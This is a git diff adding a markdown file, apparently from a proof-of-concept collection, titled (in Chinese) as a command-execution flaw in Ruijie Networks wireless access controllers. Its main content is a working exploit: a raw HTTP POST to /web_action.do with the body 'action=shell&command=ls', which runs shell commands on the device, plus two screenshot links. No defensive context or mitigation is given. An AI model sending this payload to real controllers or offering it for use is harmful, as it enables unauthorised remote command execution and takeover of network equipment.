diff --git a/锐捷网络无线AC命令执行.md b/锐捷网络无线AC命令执行.md new file mode 100644 index 0000000..c98af3a --- /dev/null +++ b/锐捷网络无线AC命令执行.md @@ -0,0 +1,15 @@ +## 锐捷网络无线AC命令执行 + +![image](https://github.com/wy876/POC/assets/139549762/0ce6bf97-7771-4cd9-aebe-d7e3b9670ddc) + +## poc +``` +POST /web_action.do HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +action=shell&command=ls +``` + +![image](https://github.com/wy876/POC/assets/139549762/1e5644da-6ac6-4663-bf23-30371b69af52)